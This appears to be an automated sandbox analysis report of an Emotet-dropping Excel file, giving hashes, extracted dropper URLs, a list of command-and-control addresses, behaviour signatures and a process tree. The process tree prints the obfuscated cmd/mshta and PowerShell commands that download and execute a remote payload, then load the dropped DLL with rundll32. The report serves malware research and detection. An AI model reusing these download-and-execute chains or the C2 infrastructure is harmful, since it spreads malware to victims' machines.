Analysis

  • max time kernel
    122s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 03:22

General

  • Target

    Contact.xls

  • Size

    70KB

  • MD5

    e04cb27b9dc90bc46db1427db6c0a1e9

  • SHA1

    f87d71f6ac3588b9c5da2587801c320633783b04

  • SHA256

    d5b77f3b4a645ee3c6a166172d9b1d5c48f0228ba8cee64332af3cddab84e4a0

  • SHA512

    c01e9f94b6a319b6f208edbffb16790613a3f207b8a2113534a1c910241b71373e787b3ee394333babf7b014604f3140d5a16385dcdef007f91324584065f09f

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Contact.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1536
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:564
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:308
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1988
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1972
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1544
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qvqzjahpzslky\ycdtlrtvufq.zov",isOqWZtCWwIu
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1512
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qvqzjahpzslky\ycdtlrtvufq.zov",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1708

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • \Users\Public\Documents\ssd.dll
    MD5

    f1eb9fcef8fdfa315b3b1697acbf3130

    SHA1

    32ea2aedbdbd45db0899eff996b550c4518f9aad

    SHA256

    61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d

    SHA512

    cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1

  • memory/308-63-0x00000000022A0000-0x0000000002590000-memory.dmp
    Filesize

    2.9MB

  • memory/308-62-0x00000000022A0000-0x0000000002590000-memory.dmp
    Filesize

    2.9MB

  • memory/1536-57-0x0000000076371000-0x0000000076373000-memory.dmp
    Filesize

    8KB

  • memory/1536-54-0x000000002FC61000-0x000000002FC64000-memory.dmp
    Filesize

    12KB

  • memory/1536-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1536-55-0x0000000071251000-0x0000000071253000-memory.dmp
    Filesize

    8KB

  • memory/1536-115-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1544-79-0x0000000000AD0000-0x0000000000AF6000-memory.dmp
    Filesize

    152KB

  • memory/1544-81-0x0000000000B50000-0x0000000000B76000-memory.dmp
    Filesize

    152KB

  • memory/1544-83-0x0000000002480000-0x00000000024A6000-memory.dmp
    Filesize

    152KB

  • memory/1544-85-0x00000000024E0000-0x0000000002506000-memory.dmp
    Filesize

    152KB

  • memory/1544-87-0x0000000002660000-0x0000000002686000-memory.dmp
    Filesize

    152KB

  • memory/1544-90-0x0000000002830000-0x0000000002856000-memory.dmp
    Filesize

    152KB

  • memory/1544-77-0x00000000001F0000-0x0000000000216000-memory.dmp
    Filesize

    152KB

  • memory/1708-103-0x00000000024C0000-0x00000000024E6000-memory.dmp
    Filesize

    152KB

  • memory/1708-101-0x00000000023E0000-0x0000000002406000-memory.dmp
    Filesize

    152KB

  • memory/1708-97-0x0000000000420000-0x0000000000446000-memory.dmp
    Filesize

    152KB

  • memory/1708-105-0x00000000025C0000-0x00000000025E6000-memory.dmp
    Filesize

    152KB

  • memory/1708-107-0x00000000026E0000-0x0000000002706000-memory.dmp
    Filesize

    152KB

  • memory/1708-109-0x00000000027E0000-0x0000000002806000-memory.dmp
    Filesize

    152KB

  • memory/1708-111-0x0000000002A10000-0x0000000002A36000-memory.dmp
    Filesize

    152KB

  • memory/1708-113-0x0000000002BC1000-0x0000000002BE3000-memory.dmp
    Filesize

    136KB

  • memory/1708-114-0x0000000002BC0000-0x0000000002BE6000-memory.dmp
    Filesize

    152KB

  • memory/1708-95-0x0000000000250000-0x0000000000276000-memory.dmp
    Filesize

    152KB